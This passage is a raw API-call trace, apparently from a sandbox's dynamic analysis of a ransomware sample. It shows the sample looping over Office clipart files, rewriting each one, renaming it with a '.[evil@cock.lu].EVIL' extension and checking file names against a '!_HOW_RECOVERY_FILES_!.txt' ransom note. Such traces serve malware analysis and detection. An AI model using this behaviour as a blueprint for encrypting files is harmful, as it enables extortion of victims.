(_String1="J0099158.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0129.288] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099158.WMF") returned 0x0 [0129.288] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF") returned 0x45 [0129.288] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099158.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0129.291] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6630, lpOverlapped=0x0) returned 1 [0129.745] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.745] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.745] _errno () returned 0x84b1160840 [0129.745] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.745] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x6640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6640, lpOverlapped=0x0) returned 1 [0129.746] CloseHandle (hObject=0x1a8) returned 1 [0129.746] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0129.746] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0129.746] __uncaught_exception () returned 0x84b1160800 [0129.746] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0129.746] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099158.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099158.wmf.[evil@cock.lu].evil")) returned 1 [0129.747] ??_V@YAXPEAX@Z () returned 0x1 [0129.750] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF", dwFileAttributes=0x200) returned 0 [0129.750] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0129.750] wcsstr (_Str="J0099159.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0129.750] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF") returned 69 [0129.750] wcscmp (_String1="J0099159.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0129.750] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099159.WMF") returned 0x0 [0129.750] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF") returned 0x45 [0129.750] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099159.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0129.752] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6b9a, lpOverlapped=0x0) returned 1 [0129.823] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.823] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.823] _errno () returned 0x84b1160840 [0129.824] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.824] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x6ba0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6ba0, lpOverlapped=0x0) returned 1 [0129.824] CloseHandle (hObject=0x1a8) returned 1 [0129.824] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0129.824] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0129.824] __uncaught_exception () returned 0x84b1160800 [0129.824] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0129.824] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099159.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099159.wmf.[evil@cock.lu].evil")) returned 1 [0129.843] ??_V@YAXPEAX@Z () returned 0x1 [0129.847] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF", dwFileAttributes=0x200) returned 0 [0129.847] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0129.847] wcsstr (_Str="J0099160.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0129.847] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG") returned 69 [0129.847] wcscmp (_String1="J0099160.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0129.847] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099160.JPG") returned 0x0 [0129.847] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG") returned 0x45 [0129.848] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099160.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0129.850] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3b29, lpOverlapped=0x0) returned 1 [0129.894] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.894] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.894] _errno () returned 0x84b1160840 [0129.894] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.894] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x3b40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3b40, lpOverlapped=0x0) returned 1 [0129.894] CloseHandle (hObject=0x1a8) returned 1 [0129.894] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0129.894] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0129.895] __uncaught_exception () returned 0x84b1160800 [0129.895] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0129.895] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099160.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099160.jpg.[evil@cock.lu].evil")) returned 1 [0129.895] ??_V@YAXPEAX@Z () returned 0x1 [0129.898] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG", dwFileAttributes=0x200) returned 0 [0129.898] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0129.898] wcsstr (_Str="J0099161.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0129.898] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG") returned 69 [0129.898] wcscmp (_String1="J0099161.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0129.898] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099161.JPG") returned 0x0 [0129.898] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG") returned 0x45 [0129.898] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099161.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0129.900] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1bf2, lpOverlapped=0x0) returned 1 [0129.936] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.936] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.936] _errno () returned 0x84b1160840 [0129.936] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.936] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1c00, lpOverlapped=0x0) returned 1 [0129.936] CloseHandle (hObject=0x1a8) returned 1 [0129.936] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0129.936] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0129.936] __uncaught_exception () returned 0x84b1160800 [0129.936] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0129.937] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099161.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099161.jpg.[evil@cock.lu].evil")) returned 1 [0129.938] ??_V@YAXPEAX@Z () returned 0x1 [0129.941] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG", dwFileAttributes=0x200) returned 0 [0129.941] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0129.941] wcsstr (_Str="J0099162.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0129.941] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG") returned 69 [0129.941] wcscmp (_String1="J0099162.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0129.941] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099162.JPG") returned 0x0 [0129.941] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG") returned 0x45 [0129.941] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099162.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0129.943] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4cc8, lpOverlapped=0x0) returned 1 [0129.984] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.984] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0129.984] _errno () returned 0x84b1160840 [0129.984] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.984] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x4ce0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4ce0, lpOverlapped=0x0) returned 1 [0129.984] CloseHandle (hObject=0x1a8) returned 1 [0129.985] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0129.985] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0129.985] __uncaught_exception () returned 0x84b1160800 [0129.985] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0129.985] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099162.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099162.jpg.[evil@cock.lu].evil")) returned 1 [0129.986] ??_V@YAXPEAX@Z () returned 0x1 [0129.989] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG", dwFileAttributes=0x200) returned 0 [0129.989] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0129.989] wcsstr (_Str="J0099163.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0129.989] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF") returned 69 [0129.989] wcscmp (_String1="J0099163.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0129.989] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099163.WMF") returned 0x0 [0129.989] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF") returned 0x45 [0129.989] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099163.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0129.991] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5754, lpOverlapped=0x0) returned 1 [0130.021] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.021] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.021] _errno () returned 0x84b1160840 [0130.021] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.022] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x5760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5760, lpOverlapped=0x0) returned 1 [0130.022] CloseHandle (hObject=0x1a8) returned 1 [0130.022] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.022] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.022] __uncaught_exception () returned 0x84b1160800 [0130.022] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.022] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099163.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099163.wmf.[evil@cock.lu].evil")) returned 1 [0130.023] ??_V@YAXPEAX@Z () returned 0x1 [0130.026] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF", dwFileAttributes=0x200) returned 0 [0130.026] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.026] wcsstr (_Str="J0099164.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.026] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF") returned 69 [0130.026] wcscmp (_String1="J0099164.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.026] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099164.WMF") returned 0x0 [0130.026] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF") returned 0x45 [0130.026] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099164.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.028] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x55ba, lpOverlapped=0x0) returned 1 [0130.056] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.056] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.056] _errno () returned 0x84b1160840 [0130.057] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.057] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x55c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x55c0, lpOverlapped=0x0) returned 1 [0130.057] CloseHandle (hObject=0x1a8) returned 1 [0130.057] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.057] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.057] __uncaught_exception () returned 0x84b1160800 [0130.057] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.057] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099164.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099164.wmf.[evil@cock.lu].evil")) returned 1 [0130.058] ??_V@YAXPEAX@Z () returned 0x1 [0130.061] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099164.WMF", dwFileAttributes=0x200) returned 0 [0130.061] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.061] wcsstr (_Str="J0099165.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.061] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG") returned 69 [0130.061] wcscmp (_String1="J0099165.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.061] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099165.JPG") returned 0x0 [0130.061] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG") returned 0x45 [0130.061] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099165.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.063] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc53a, lpOverlapped=0x0) returned 1 [0130.087] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.087] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.087] _errno () returned 0x84b1160840 [0130.087] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.087] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xc540, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc540, lpOverlapped=0x0) returned 1 [0130.087] CloseHandle (hObject=0x1a8) returned 1 [0130.087] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.088] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.088] __uncaught_exception () returned 0x84b1160800 [0130.088] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.088] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099165.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099165.jpg.[evil@cock.lu].evil")) returned 1 [0130.089] ??_V@YAXPEAX@Z () returned 0x1 [0130.091] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099165.JPG", dwFileAttributes=0x200) returned 0 [0130.091] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.091] wcsstr (_Str="J0099166.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.091] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG") returned 69 [0130.091] wcscmp (_String1="J0099166.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.091] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099166.JPG") returned 0x0 [0130.091] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG") returned 0x45 [0130.092] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099166.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099166.jpg"), 